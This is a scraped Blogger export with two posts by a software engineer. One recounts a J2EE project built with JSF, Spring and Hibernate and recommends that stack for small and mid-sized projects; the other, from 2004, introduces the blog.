Recently I finished an assignment on J2EE technology, and it was a good experience.<br /><br />The project was a typical web-based, database-driven one. After studying the application, I decided to use JSF in the front end, Spring in the middle, and Hibernate for interacting with the database.<br />Though I hadn't worked on JSF & Spring prior to this project, and my team was also new, I took the challenge.<br /><br />I decided on JSF because the client wanted a rich GUI. As soon as we started and got into the project, I realized that the learning curve of JSF is very high. At that time the team was struggling very hard to get hold of it. And the result was that we delivered the first module 10 days after the deadline.<br /><br />As time passed, we got hold of JSF and delivered all the modules on/before time. We used various in-built components available on the net, which actually saved most of our time.<br />We also met the client's performance benchmark.<br /><br />So what I feel is that for small & middle-level projects you can use "JSF-Spring-Hibernate" because:<br />1. You will get good in-built components in JSF<br />2. Spring helps you in wiring objects, and it has a good AOP feature<br />3. 
Hibernate is a good ORM tool with lots of features.<br /><br />Apart from good learning on the "JSF-Spring-Hibernate" framework, I also learned that while deciding on tools/frameworks you should keep in mind how the team is and what the time frame is.<br /><br />So guys, try to use the "JSF-Spring-Hibernate" framework and share your experiences.
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-1100867299739927832004-11-19T04:18:00.000-08:002004-12-10T03:05:38.213-08:00Kick start....!!
<span style="font-family:georgia;">Being a Software Engineer, I used to search for most things on the Net, and my friend <a href="http://abhinavmaheshwari.blogspot.com/">Abhinav</a> also has blogger and it helps me a lot...... thanks Abhi!!!.
<br />
<br />So finally I decided to have a blog so that I can help someone or share some good information on the technology front.
<br />
<br />
<br /></span>Unknownnoreply@blogger.com0